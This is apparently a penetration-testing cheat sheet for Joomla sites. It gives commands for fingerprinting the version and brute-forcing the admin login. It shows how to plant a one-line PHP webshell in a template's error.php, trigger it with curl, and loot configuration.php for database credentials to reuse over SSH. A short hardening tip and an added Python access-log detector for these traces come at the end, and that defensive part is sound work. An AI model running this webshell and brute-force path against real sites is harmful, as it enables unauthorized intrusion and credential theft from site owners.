Joomla
PHP CMS. Fingerprint the version, brute the admin at /administrator, then use the template editor for PHP RCE; configuration.php holds the DB credentials.
Ports
| Port | Proto | Notes |
|---|---|---|
| 80 | tcp | HTTP |
| 443 | tcp | HTTPS |
Fingerprint
- /administrator login, README.txt and language XML reveal the version
- droopescan / joomscan identify version and extensions
Key files
| Path | Holds | Sensitive |
|---|---|---|
| configuration.php | DB credentials and the secret | sensitive |
| administrator/ | admin panel and template editor | |
Default / weak creds
admin via brute force / reuse
Known CVEs
| CVE | Impact |
|---|---|
| extension CVEs | most Joomla RCE/SQLi comes from third-party extensions |
Exploitation primitives
- joomscan / droopescan for version and components
- Admin -> Templates -> edit a template PHP file (e.g. error.php) for RCE
- configuration.php DB creds are often reused for SSH/su
Overview
Joomla is a common PHP CMS. The reliable path is weak admin credentials, after which the built-in template editor is a PHP shell.
Enumeration
joomscan --url http://<TARGET>/
Version directly:
curl -s http://<TARGET>/administrator/manifests/files/joomla.xml | grep -i version
Brute the admin
The default admin user is often admin; brute /administrator with a script that handles the login form's CSRF token:
python3 joomla-brute.py -u http://<TARGET> -w passwords.txt -usr admin
Admin → RCE
After logging into /administrator: Templates → Templates → (pick one) → edit error.php (or index.php), insert a webshell:
<?php system($_GET['c']); ?>
Save, then trigger it:
curl "http://<TARGET>/templates/<template>/error.php?c=id"
Loot
curl -s http://<TARGET>/configuration.php # DB creds + secret (via LFI/shell); often reused for SSH
Hardening
Strong admin creds + 2FA, keep extensions patched, and restrict access to /administrator.
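To see whether the path described on this page has been walked against a site you run, the access log can be checked for its three visible traces: a fetch of the joomla.xml manifest, a burst of POSTs to /administrator, and a direct request to a template's error.php or index.php with a query string. This is an added example, not part of the original page; the combined log format, the threshold of 5 and the sample lines are assumptions.

```python
import re
from collections import Counter

# Apache/nginx "combined" log line: ip, method, path, status (assumed format).
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')
# Template PHP file requested by URL with parameters; these files are normally
# loaded by Joomla's own index.php, not fetched directly.
TEMPLATE_PHP = re.compile(r'^/templates/[^/]+/(?:error|index)\.php\?')
MANIFEST = '/administrator/manifests/files/joomla.xml'
LOGIN_POST_THRESHOLD = 5  # assumed threshold; tune to your own traffic


def scan(lines, threshold=LOGIN_POST_THRESHOLD):
    """Return sorted (ip, finding) pairs for the three patterns on this page."""
    findings = set()
    admin_posts = Counter()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, method, path, status = m.groups()
        if path.split('?')[0] == MANIFEST:
            findings.add((ip, 'version-fingerprint'))
        if method == 'POST' and path.startswith('/administrator'):
            admin_posts[ip] += 1
        if TEMPLATE_PHP.match(path) and status == '200':
            findings.add((ip, 'template-php-direct-request'))
    for ip, count in admin_posts.items():
        if count >= threshold:
            findings.add((ip, 'admin-login-burst'))
    return sorted(findings)


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = (
    ['198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] '
     '"GET /administrator/manifests/files/joomla.xml HTTP/1.1" 200 1800']
    + ['198.51.100.7 - - [01/Jan/2024:10:01:%02d +0000] '
       '"POST /administrator/index.php HTTP/1.1" 303 0' % i for i in range(6)]
    + ['198.51.100.7 - - [01/Jan/2024:10:05:00 +0000] '
       '"GET /templates/example/error.php?c=id HTTP/1.1" 200 54',
       '203.0.113.9 - - [01/Jan/2024:10:06:00 +0000] '
       '"POST /administrator/index.php HTTP/1.1" 303 0',
       '203.0.113.9 - - [01/Jan/2024:10:06:05 +0000] '
       '"GET /templates/example/css/template.css HTTP/1.1" 200 900']
)

if __name__ == '__main__':
    for ip, finding in scan(SAMPLE):
        print(ip, finding)
```

A template-php-direct-request hit with status 200 is the one to act on first: compare that template file against a clean copy of the template.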